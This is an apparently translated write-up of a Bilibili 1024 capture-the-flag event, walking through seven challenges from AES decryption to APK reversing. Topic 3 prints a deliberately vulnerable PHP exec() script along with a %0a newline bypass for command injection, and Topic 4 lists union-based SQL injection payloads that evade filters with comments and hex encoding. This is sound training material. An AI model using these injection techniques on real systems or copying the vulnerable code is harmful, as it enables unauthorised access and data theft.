Title address: https://www.bilibili.com/blackboard/20211024.html
Topic 1
AES decryption, password: happy_1024_2233. The ciphertext is the bottom two lines of characters, which need to be spelled into one line (I really didn't expect this at first!)
Online decryption website: http://tool.chacuo.net/cryptaes
Topic 2
F12, find the hidden flag in home.vue
Topic 3
Download the compressed package and extract it to get eval.php
<?php /* bilibili- ( ゜- ゜)つロ Cheers~ uat: http://192.168.3.2/uat/eval.php pro: http://security.bilibili.com/sec1024/q/pro/eval.php */ $args = @$_GET['args']; if (count($args) >3) { exit(); } for ( $i=0; $i<count($args); $i++ ){ if ( !preg_match('/^\w+$/', $args[$i]) ) { exit(); } } // todo: other filter $cmd = "/bin/2233 " . implode(" ", $args); exec($cmd, $out); for ($i=0; $i<count($out); $i++){ echo($out[$i]); echo('<br>'); } ?>
The general idea is to pass in the command from the args parameter to find the flag. The args array element is limited to 3, and the regular matching / ^ \ w + $/ filters out special characters such as /,. And. Args also splices / bin/2233. The direct command cannot be executed normally. This can be bypassed by the end line break%0a, and then the command can be executed.
ls view files in the current directory
cat passwd gets the flag
Topic 4
The address is the same as topic 2, but there is no idea. Later, I got the prompt of sql injection. Again, I found an api interface under F12, which is some parameters for submitting log information through POST.
user_ There is an injection point at name, and spaces are filtered.
Get library name, q
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,database()", "action": "", "page": 1, "size": 20 }
Get table name, flag,log,user
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()", "action": "", "page": 1, "size": 20 }
Get the field name and id (quotation marks cannot be used here, otherwise it will be closed in advance, resulting in an error. It can be bypassed by hexadecimal. The hexadecimal of flag is 666c6167, preceded by 0x)
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666c6167", "action": "", "page": 1, "size": 20 }
The last step is to get the flag
{ "user_id": "", "user_name": "1/**/union/**/select/**/1,2,3,4,group_concat(id)/**/from/**/flag", "action": "", "page": 1, "size": 20 }
Topic 5
Download test.apk, enter the account name and password, and prompt "a little ~ ~" after submitting
Does that give flag when you input it correctly? Gradually forget the question. This question tests reverse analysis~
Refer to other solutions below:
JADX open
Encrypt is an encryption process. For two strings of characters in MainActivity, just press the reverse operation in encrypt once. That is, one base64 decoding, one XOR 3, and two strings can be combined into a string of flag s
Problem solving script
import base64 obyteArray = [0x59, 0x57, 0x42, 0x6c, 0x4f, 0x6d, 0x5a, 0x6e, 0x4e, 0x6a, 0x41, 0x75, 0x4f, 0x6d, 0x4a, 0x6d, 0x4e, 0x7a, 0x41, 0x78, 0x4f, 0x32, 0x59, 0x3d] code = [0x4e, 0x6a, 0x49, 0x31, 0x4f, 0x7a, 0x41, 0x33, 0x59, 0x47, 0x41, 0x75, 0x4e, 0x6a, 0x4e, 0x6d, 0x4e, 0x7a, 0x63, 0x37, 0x59, 0x6d, 0x55, 0x3d] user = "" password = "" for i in range(24): user+=chr(obyteArray[i]) password+=chr(code[i]) print(base64.b64decode(user)) print(base64.b64decode(password)) a1 = str(base64.b64decode(user),encoding="utf-8") a2 = str(base64.b64decode(password),encoding="utf-8") ans="" ans1="" for i1 in range(17): p=ord(a1[i1])^3 ans+=chr(p) p1=ord(a2[i1])^3 ans1+=chr(p1) print(ans) print(ans1)
Topic 6
Refer to: https://www.52pojie.cn/thread-1532604-1-1.html
Topic 7
For log analysis, you need to find out all malicious IP addresses. Some answers are as follows:
jj.bdc.bbb.cc,dc.bb.ii.jj,cde.ced.bbb.dd,cdd.bcc.bg.bib,cd.bb.cai.cbh,cd.baf.cae.cbc,bfh.ff.dj.jf,bfh.ff.dj.ig,bfh.ff.dj.fb,bfh.ff.dj.bd,bfh.ff.dj.bcf,bbb.bb.bjd.bhf,bbb.bb.bjd.bhc,bbb.bb.bjd.bha,bbb.bb.bjd.bgc,bba.ja.ccb.cbc,bba.ja.cca.beg